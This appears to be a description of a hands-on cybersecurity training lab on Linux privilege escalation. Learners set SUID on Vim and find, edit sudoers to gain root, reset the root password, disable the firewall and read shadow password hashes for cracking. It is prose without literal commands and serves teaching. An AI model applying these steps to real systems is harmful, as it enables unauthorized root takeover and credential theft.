Privilege escalation in Linux is the method of promoting your authority level, by switching from one user to another one and obtaining more privileges. For instance, a regular user on Linux can switch to root or get the same permissions as root. This can be approved usage, with the use of the su or sudo command.
In this hands-on lab, learners will learn how to escalate privileges in Linux. First, they will deliberately configure the Vim text editor in a way that will allow security breaches, and then they will test to see how this configuration can be exploited. Next, they will use elevated privileges to reset the password of the root user, restart a service, disable the firewall, and access password hashes. Finally, they will grant administrative privileges to the find command, and then they will exploit the administrative privileges by running commands as the root user, and then accessing password hashes.
Understand the Scenario
In this virtual lab, you are responsible for ensuring that server configurations for your organization are secure. You believe one of the servers has been configured in a way that grants administrative privileges to programs that could be exploited. To accomplish this task, you will use a default installation of CentOS 7 Linux with the Server with GUI package installed. Non-privileged accounts have been created for you. You will be guided through the process of adding software if necessary.
Create a security vulnerability by granting administrative privileges to Vim
In this section of the virtual lab, learners will learn how to deliberately configure the Vim text editor in a way that will allow security breaches. To accomplish this task, learners will:
- Go to Terminal and then run the find command to find programs that execute with administrative privileges and run the cat command to attempt to view the shadow file.
- The shadow file is the storage location for the encrypted user account passwords. By default, only the system administrator can view the file contents. You will receive an access denied message because you will be signed in using an account that does not have administrative privileges.
- Run the su command to switch to the root user account. Then, when prompted, enter the password and again run the chmod commands to configure Vim to run with administrative privileges and enter the exit to return to the user01 account.
- Run the find command to find programs that run with administrative privileges, and to include a search for Vim.
Finally, learners will check and confirm that they have searched for programs that run with administrative privileges. They have granted administrative privileges to users who run the Vim text editor.
Exploit the root privilege granted to Vim
The privilege escalation is generally applied in development for a more particular attack, enabling attackers to deploy a malicious payload in the targeted system. In this section of the lab, learners will learn how to exploit the root privileges granted to vim. First, they will run the vim command to open the sudoers file by using the Vim text editor. This file allows for the delegation of administrative privileges. The entry you will make delegates access to all commands on the system as if you were the system administrator (root user). Next, you will move to the end of the file, and then enter Insert mode in Vim and force Vim to save the changes, and then exit Vim. In this way, you will delegate all system administrator privileges to the user01 account. This exploits the security vulnerability you created when you configured Vim in the first section of the lab, granting it the ability to run with the system administrator credentials. Finally, you will check and confirm that you delegated full administrative privileges to the user01 account by editing the sudoers file.
Use elevated privileges to take control of a server
A privilege escalation is a kind of network intrusion that seeks the help of programming errors or design imperfections or flaws to grant the attacker advanced access to the server. In this section of the virtual lab, learners will learn how to use elevated privileges to take control of a server. First, they will run the sudo command to reset the password. When prompted, they will enter the new password. This action will lock the legitimate system administrator out of the server. Next, they will run the restart command to restart the sshd service, run the stop and disable commands to stop, and disable the firewall. Next they will run the sudo cat command to view the encrypted passwords stored in the shadow file. This will allow learners to copy the encrypted passwords into a password cracking program like John the Ripper. Finally, they will run the vim commands to access a command prompt that has root privileges.
Create a security vulnerability by configuring the find command
In this section of the virtual lab, you will learn how to create a security vulnerability by configuring the find command. For this, you will run the root command to get root privileges and run the chmod command to configure the find command to run using administrative privileges. This configuration creates a security vulnerability that will allow you to run the find command with the root administrator privileges. The find command can run a command after the search completes. In this case, that command executes using root privileges. Finally, you will run the find command to exploit the encrypted passwords on the system.
Lab Summary Conclusion
After completing the "New Escalate Privileges in Linux" virtual lab, you will have accomplished the following:
- Granted administrative privileges to the Vim text editor.
- Exploited the administrative privileges of Vim by elevating your privileges to that of the root user.
- Used elevated privileges to reconfigure the server by resetting the password of the root user, restarting a service, disabling the firewall, and accessing password hashes.
- Granted administrative privileges to the find command.
- Exploited the administrative privileges of the find command by running commands as the root user, and then accessing password hashes.